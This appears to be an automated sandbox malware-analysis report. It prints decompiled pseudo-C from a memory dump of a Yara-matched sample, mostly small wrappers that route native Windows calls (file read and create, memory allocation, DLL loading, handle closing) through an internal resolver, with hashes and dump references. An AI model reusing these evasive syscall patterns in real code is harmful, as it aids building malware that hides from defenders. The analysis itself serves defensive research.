                                                                                                                                                      				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36, _a40); // executed
                                                                                                                                                      				return _t18;
                                                                                                                                                      			}







                                                                                                                                                      APIs
                                                                                                                                                      • NtReadFile.NTDLL(2MA,5EB6522D,FFFFFFFF,004149F1,?,?,2MA,?,004149F1,FFFFFFFF,5EB6522D,00414D32,?,00000000), ref: 00419E45
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000005.00000002.2218059769.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FileRead
                                                                                                                                                      • String ID: 2MA$2MA
                                                                                                                                                      • API String ID: 2738559852-947276439
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 37%
                                                                                                                                                      			E00419DFE(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
                                                                                                                                                      				void* _t18;
                                                                                                                                                      				void* _t27;
                                                                                                                                                      				intOrPtr* _t29;
                                                                                                                                                      				void* _t31;
                                                                                                                                                      
                                                                                                                                                      				_t13 = _a4;
                                                                                                                                                      				_t29 = _a4 + 0xc48;
                                                                                                                                                      				E0041A950(_t27, _t13, _t29,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
                                                                                                                                                      				_t6 =  &_a32; // 0x414d32
                                                                                                                                                      				_t12 =  &_a8; // 0x414d32
                                                                                                                                                      				_t18 =  *((intOrPtr*)( *_t29))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36, _a40, 0xec8b550f, _t31); // executed
                                                                                                                                                      				return _t18;
                                                                                                                                                      			}








                                                                                                                                                      APIs
                                                                                                                                                      • NtReadFile.NTDLL(2MA,5EB6522D,FFFFFFFF,004149F1,?,?,2MA,?,004149F1,FFFFFFFF,5EB6522D,00414D32,?,00000000), ref: 00419E45
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000005.00000002.2218059769.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FileRead
                                                                                                                                                      • String ID: 2MA$2MA
                                                                                                                                                      • API String ID: 2738559852-947276439
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E00419D50(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, char _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
                                                                                                                                                      				long _t21;
                                                                                                                                                      				void* _t31;
                                                                                                                                                      
                                                                                                                                                      				_t3 = _a4 + 0xc40; // 0xc40
                                                                                                                                                      				E0041A950(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
                                                                                                                                                      				_t11 =  &_a20; // 0x414b77
                                                                                                                                                      				_t21 = NtCreateFile(_a8, _a12, _a16,  *_t11, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
                                                                                                                                                      				return _t21;
                                                                                                                                                      			}






                                                                                                                                                      APIs
                                                                                                                                                      • NtCreateFile.NTDLL(00000060,00409CC3,?,wKA,00409CC3,FFFFFFFF,?,?,FFFFFFFF,00409CC3,00414B77,?,00409CC3,00000060,00000000,00000000), ref: 00419D9D
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000005.00000002.2218059769.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CreateFile
                                                                                                                                                      • String ID: wKA
                                                                                                                                                      • API String ID: 823142352-3165208591
                                                                                                                                                      • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                                                                                                      • Instruction ID: 0d977cd1f4fbd36c9bd444ef8f6a04c43f7f15de33bda2cf86b45a3658e1eede
                                                                                                                                                      • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                                                                                                      • Instruction Fuzzy Hash: BFF0BDB2211208AFCB08CF89DC95EEB77ADAF8C754F158248BA1D97241C630E8518BA4
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 75%
                                                                                                                                                      			E00419D4B(void* __edi, void* __esi, intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, char _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
                                                                                                                                                      				long _t22;
                                                                                                                                                      				void* _t34;
                                                                                                                                                      				signed int _t37;
                                                                                                                                                      
                                                                                                                                                      				_t34 = __esi + __edi;
                                                                                                                                                      				_t37 =  *(__edi - 0x1374aac3) * 0x8b08458b;
                                                                                                                                                      				_push(_t37);
                                                                                                                                                      				_t16 = _a4;
                                                                                                                                                      				_push(_t34);
                                                                                                                                                      				_t4 = _t16 + 0xc40; // 0xc40
                                                                                                                                                      				E0041A950(__edi, _a4, _t4,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
                                                                                                                                                      				_t12 =  &_a20; // 0x414b77
                                                                                                                                                      				_t22 = NtCreateFile(_a8, _a12, _a16,  *_t12, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
                                                                                                                                                      				return _t22;
                                                                                                                                                      			}







                                                                                                                                                      APIs
                                                                                                                                                      • NtCreateFile.NTDLL(00000060,00409CC3,?,wKA,00409CC3,FFFFFFFF,?,?,FFFFFFFF,00409CC3,00414B77,?,00409CC3,00000060,00000000,00000000), ref: 00419D9D
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000005.00000002.2218059769.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CreateFile
                                                                                                                                                      • String ID: wKA
                                                                                                                                                      • API String ID: 823142352-3165208591
                                                                                                                                                      • Opcode ID: 5698370e93231dcaa876b0b3758a9e2ed387f1f8c0451b227f6c083057958c12
                                                                                                                                                      • Instruction ID: 04a2cfd867437525a0971d93455d764c76a25f5f1e9e2778de588e1df1fbb764
                                                                                                                                                      • Opcode Fuzzy Hash: 5698370e93231dcaa876b0b3758a9e2ed387f1f8c0451b227f6c083057958c12
                                                                                                                                                      • Instruction Fuzzy Hash: 72F0F6B2204149ABCB08DF98DC85CDBB7ADBF8C354B05864DFA5C93201D630E8508BA4
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      • NtCreateFile.NTDLL(00000060,00409CC3,?,wKA,00409CC3,FFFFFFFF,?,?,FFFFFFFF,00409CC3,00414B77,?,00409CC3,00000060,00000000,00000000), ref: 00419D9D
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000005.00000002.2218059769.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CreateFile
                                                                                                                                                      • String ID: wKA
                                                                                                                                                      • API String ID: 823142352-3165208591
                                                                                                                                                      • Opcode ID: 0df0540dcfb7a93cfac3ea25ea307f49f1dc3bbb10a73f40ff662512db58c0a8
                                                                                                                                                      • Instruction ID: 3dc5bac7b2f0fe61b72982d3694b8f2312eed68ad843af8c69f32f3ae199a7d4
                                                                                                                                                      • Opcode Fuzzy Hash: 0df0540dcfb7a93cfac3ea25ea307f49f1dc3bbb10a73f40ff662512db58c0a8
                                                                                                                                                      • Instruction Fuzzy Hash: 18F06CB2614109AF8B48DF98D890DEB73F9BF8C354B159648FA4D93201D631E851CBA5
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E0040ACC0(void* __eflags, void* _a4, intOrPtr _a8) {
                                                                                                                                                      				char* _v8;
                                                                                                                                                      				struct _EXCEPTION_RECORD _v12;
                                                                                                                                                      				struct _OBJDIR_INFORMATION _v16;
                                                                                                                                                      				char _v536;
                                                                                                                                                      				void* _t15;
                                                                                                                                                      				struct _OBJDIR_INFORMATION _t17;
                                                                                                                                                      				struct _OBJDIR_INFORMATION _t18;
                                                                                                                                                      				void* _t30;
                                                                                                                                                      				void* _t31;
                                                                                                                                                      				void* _t32;
                                                                                                                                                      
                                                                                                                                                      				_v8 =  &_v536;
                                                                                                                                                      				_t15 = E0041C640( &_v12, 0x104, _a8);
                                                                                                                                                      				_t31 = _t30 + 0xc;
                                                                                                                                                      				if(_t15 != 0) {
                                                                                                                                                      					_t17 = E0041CA60(__eflags, _v8);
                                                                                                                                                      					_t32 = _t31 + 4;
                                                                                                                                                      					__eflags = _t17;
                                                                                                                                                      					if(_t17 != 0) {
                                                                                                                                                      						E0041CCE0( &_v12, 0);
                                                                                                                                                      						_t32 = _t32 + 8;
                                                                                                                                                      					}
                                                                                                                                                      					_t18 = E0041AE90(_v8);
                                                                                                                                                      					_v16 = _t18;
                                                                                                                                                      					__eflags = _t18;
                                                                                                                                                      					if(_t18 == 0) {
                                                                                                                                                      						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
                                                                                                                                                      						return _v16;
                                                                                                                                                      					}
                                                                                                                                                      					return _t18;
                                                                                                                                                      				} else {
                                                                                                                                                      					return _t15;
                                                                                                                                                      				}
                                                                                                                                                      			}














                                                                                                                                                      APIs
                                                                                                                                                      • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD32
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000005.00000002.2218059769.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Load
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2234796835-0
                                                                                                                                                      • Opcode ID: 8dd989eea79af60a2177110ff857ca10202f9c8b5bfc158903865a0a4b584fe4
                                                                                                                                                      • Instruction ID: 8d9c8c5cc187846e167d7fc499b748faaade23025a89af1130ee390205ce80a6
                                                                                                                                                      • Opcode Fuzzy Hash: 8dd989eea79af60a2177110ff857ca10202f9c8b5bfc158903865a0a4b584fe4
                                                                                                                                                      • Instruction Fuzzy Hash: C40152B5D4020DA7DB10DBE5DC42FDEB7789F14308F0041AAE908A7281F634EB54C795
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 79%
                                                                                                                                                      			E00419F2B(void* __ecx, void* __edx, intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
                                                                                                                                                      				long _t14;
                                                                                                                                                      				void* _t25;
                                                                                                                                                      
                                                                                                                                                      				_pop(es);
                                                                                                                                                      				_t10 = _a4;
                                                                                                                                                      				_t3 = _t10 + 0xc60; // 0xca0
                                                                                                                                                      				E0041A950(_t25, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
                                                                                                                                                      				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
                                                                                                                                                      				return _t14;
                                                                                                                                                      			}






                                                                                                                                                      APIs
                                                                                                                                                      • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041AB24,?,00000000,?,00003000,00000040,00000000,00000000,00409CC3), ref: 00419F69
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000005.00000002.2218059769.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AllocateMemoryVirtual
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2167126740-0
                                                                                                                                                      • Opcode ID: a7981a6f947ba90aa29340339cc1beb722846e32f1cf0145686f1d6ea42ff44a
                                                                                                                                                      • Instruction ID: f41b3f2c5333d7f4cd888dcf998e8a17557808867dcfb89f421a74edea01d22c
                                                                                                                                                      • Opcode Fuzzy Hash: a7981a6f947ba90aa29340339cc1beb722846e32f1cf0145686f1d6ea42ff44a
                                                                                                                                                      • Instruction Fuzzy Hash: 83F052B2210218AFCB18DF89DC91EEB77ADAF88310F158209FA1C97241C630E910CBE4
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E00419F30(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
                                                                                                                                                      				long _t14;
                                                                                                                                                      				void* _t21;
                                                                                                                                                      
                                                                                                                                                      				_t3 = _a4 + 0xc60; // 0xca0
                                                                                                                                                      				E0041A950(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
                                                                                                                                                      				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
                                                                                                                                                      				return _t14;
                                                                                                                                                      			}






                                                                                                                                                      APIs
                                                                                                                                                      • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041AB24,?,00000000,?,00003000,00000040,00000000,00000000,00409CC3), ref: 00419F69
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000005.00000002.2218059769.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AllocateMemoryVirtual
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2167126740-0
                                                                                                                                                      • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                                                                                                      • Instruction ID: c2721ea4e084a79d388e091216dcc94a475298a8aa449db6134383b78daf1f40
                                                                                                                                                      • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                                                                                                      • Instruction Fuzzy Hash: 7DF015B2210208AFCB14DF89CC81EEB77ADAF88754F118549BE1897241C630F810CBA4
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 68%
                                                                                                                                                      			E00419E7A(intOrPtr _a8, void* _a12) {
                                                                                                                                                      				long _t8;
                                                                                                                                                      				void* _t11;
                                                                                                                                                      
                                                                                                                                                      				_pop(_t15);
                                                                                                                                                      				asm("divps xmm6, [edx-0x74aafb60]");
                                                                                                                                                      				_t5 = _a8;
                                                                                                                                                      				_t2 = _t5 + 0x10; // 0x300
                                                                                                                                                      				_t3 = _t5 + 0xc50; // 0x40a913
                                                                                                                                                      				E0041A950(_t11, _a8, _t3,  *_t2, 0, 0x2c);
                                                                                                                                                      				_t8 = NtClose(_a12); // executed
                                                                                                                                                      				return _t8;
                                                                                                                                                      			}






                                                                                                                                                      APIs
                                                                                                                                                      • NtClose.NTDLL(00414D10,?,?,00414D10,00409CC3,FFFFFFFF), ref: 00419EA5
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000005.00000002.2218059769.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Close
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3535843008-0
                                                                                                                                                      • Opcode ID: 0293319a2259be973812e0eb3616cb2209a4b8a2702c3dee2c2d5d41c173d62d
                                                                                                                                                      • Instruction ID: b03c8a88f06c1c08a05908b4bfa387aef140f3031ec888633ef747f0f5e32563
                                                                                                                                                      • Opcode Fuzzy Hash: 0293319a2259be973812e0eb3616cb2209a4b8a2702c3dee2c2d5d41c173d62d
                                                                                                                                                      • Instruction Fuzzy Hash: 59E0C275200104AFD710EFA9CC8AFE7BB68EF48360F06459AFA5C9B241C631F690C790
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E00419E80(intOrPtr _a4, void* _a8) {
                                                                                                                                                      				long _t8;
                                                                                                                                                      				void* _t11;
                                                                                                                                                      
                                                                                                                                                      				_t5 = _a4;
                                                                                                                                                      				_t2 = _t5 + 0x10; // 0x300
                                                                                                                                                      				_t3 = _t5 + 0xc50; // 0x40a913
                                                                                                                                                      				E0041A950(_t11, _a4, _t3,  *_t2, 0, 0x2c);
                                                                                                                                                      				_t8 = NtClose(_a8); // executed
                                                                                                                                                      				return _t8;
                                                                                                                                                      			}






                                                                                                                                                      APIs
                                                                                                                                                      • NtClose.NTDLL(00414D10,?,?,00414D10,00409CC3,FFFFFFFF), ref: 00419EA5
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000005.00000002.2218059769.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Close
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3535843008-0
                                                                                                                                                      • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                                                                                                      • Instruction ID: abd226b249efdbe90954a2e5a1f5a103ee35f8531edac2b51595525400ebd06d
                                                                                                                                                      • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                                                                                                      • Instruction Fuzzy Hash: FED01776200214ABD710EB99CC86EE77BACEF48760F15449ABA5C9B242C530FA5086E0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000005.00000002.2218172040.0000000000900000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: true
                                                                                                                                                      • Associated: 00000005.00000002.2218167906.00000000008F0000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000005.00000002.2218237266.00000000009E0000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000005.00000002.2218241028.00000000009F0000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000005.00000002.2218246476.00000000009F4000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000005.00000002.2218251764.00000000009F7000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000005.00000002.2218255269.0000000000A00000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000005.00000002.2218289035.0000000000A60000.00000040.00000001.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      • Opcode ID: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                                                                                                                      • Instruction ID: e6c77262f5ba2182d122b5874ee39bb292c5f7eee28c199429390ea98cabeb31
                                                                                                                                                      • Opcode Fuzzy Hash: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                                                                                                                      • Instruction Fuzzy Hash: 79B01272100940C7E309D724DD06F4B7210FFC0F01F008A3EA00B81851DA38A93CC846
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000005.00000002.2218172040.0000000000900000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: true
                                                                                                                                                      • Associated: 00000005.00000002.2218167906.00000000008F0000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000005.00000002.2218237266.00000000009E0000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000005.00000002.2218241028.00000000009F0000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000005.00000002.2218246476.00000000009F4000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000005.00000002.2218251764.00000000009F7000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000005.00000002.2218255269.0000000000A00000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000005.00000002.2218289035.0000000000A60000.00000040.00000001.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      • Opcode ID: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
                                                                                                                                                      • Instruction ID: 41e4343c146f66e2bb318e135f4e172b2897deff735033a37a94e91f6413aa4b
                                                                                                                                                      • Opcode Fuzzy Hash: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
                                                                                                                                                      • Instruction Fuzzy Hash: DBB012B2100540C7E3099714D946B4B7210FB90F00F40C93BA11B81861DB3C993CD46A
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000005.00000002.2218172040.0000000000900000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: true
                                                                                                                                                      • Associated: 00000005.00000002.2218167906.00000000008F0000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000005.00000002.2218237266.00000000009E0000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000005.00000002.2218241028.00000000009F0000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000005.00000002.2218246476.00000000009F4000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000005.00000002.2218251764.00000000009F7000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000005.00000002.2218255269.0000000000A00000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000005.00000002.2218289035.0000000000A60000.00000040.00000001.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      • Opcode ID: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
                                                                                                                                                      • Instruction ID: 3a645d05db048e5a2937cf36c3d58d647fc753ae06e93f94360992995f7f05c0
                                                                                                                                                      • Opcode Fuzzy Hash: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
                                                                                                                                                      • Instruction Fuzzy Hash: 2AB012B1504640C7F304F704D905B16B212FBD0F00F408938A14F86591D73DAD2CC78B
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000005.00000002.2218172040.0000000000900000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: true
                                                                                                                                                      • Associated: 00000005.00000002.2218167906.00000000008F0000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000005.00000002.2218237266.00000000009E0000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000005.00000002.2218241028.00000000009F0000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000005.00000002.2218246476.00000000009F4000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000005.00000002.2218251764.00000000009F7000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000005.00000002.2218255269.0000000000A00000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000005.00000002.2218289035.0000000000A60000.00000040.00000001.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000005.00000002.2218172040.0000000000900000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: true
                                                                                                                                                      • Associated: 00000005.00000002.2218167906.00000000008F0000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218237266.00000000009E0000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218241028.00000000009F0000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218246476.00000000009F4000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218251764.00000000009F7000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218255269.0000000000A00000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218289035.0000000000A60000.00000040.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      • Opcode ID: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                                                                                                                      • Instruction ID: 05ac91611fc184a3f88202f4b9a2f722369f22817df951cee1fa85cf63676e78
                                                                                                                                                      • Opcode Fuzzy Hash: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                                                                                                                      • Instruction Fuzzy Hash: A2B01272605540C7F30ADB04D915B467251FBC0F00F408934E50746590D77D9E38D587
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000005.00000002.2218172040.0000000000900000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: true
                                                                                                                                                      • Associated: 00000005.00000002.2218167906.00000000008F0000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218237266.00000000009E0000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218241028.00000000009F0000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218246476.00000000009F4000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218251764.00000000009F7000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218255269.0000000000A00000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218289035.0000000000A60000.00000040.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      • Opcode ID: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                                                                                                                                      • Instruction ID: b885d126f35a04098635745a666b93c7a8e67e4acbf17db3f6051f78ecae7b76
                                                                                                                                                      • Opcode Fuzzy Hash: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                                                                                                                                      • Instruction Fuzzy Hash: 9AB01273104944C7E349A714DD06B8B7210FBC0F01F00893AA00786851DB389A2CE986
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000005.00000002.2218172040.0000000000900000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: true
                                                                                                                                                      • Associated: 00000005.00000002.2218167906.00000000008F0000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218237266.00000000009E0000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218241028.00000000009F0000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218246476.00000000009F4000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218251764.00000000009F7000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218255269.0000000000A00000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218289035.0000000000A60000.00000040.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      • Opcode ID: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                                                                                                                      • Instruction ID: bb22edd625d441e86b4201bf2007cb1784deb073e32f09f3a807e6c8f80ed535
                                                                                                                                                      • Opcode Fuzzy Hash: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                                                                                                                      • Instruction Fuzzy Hash: ACB01272104544C7F3099714ED06B8B7210FB80F00F00893AA007828A1DB39992CE456
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000005.00000002.2218172040.0000000000900000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: true
                                                                                                                                                      • Associated: 00000005.00000002.2218167906.00000000008F0000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218237266.00000000009E0000.00000040.00000001.sdmp Download File
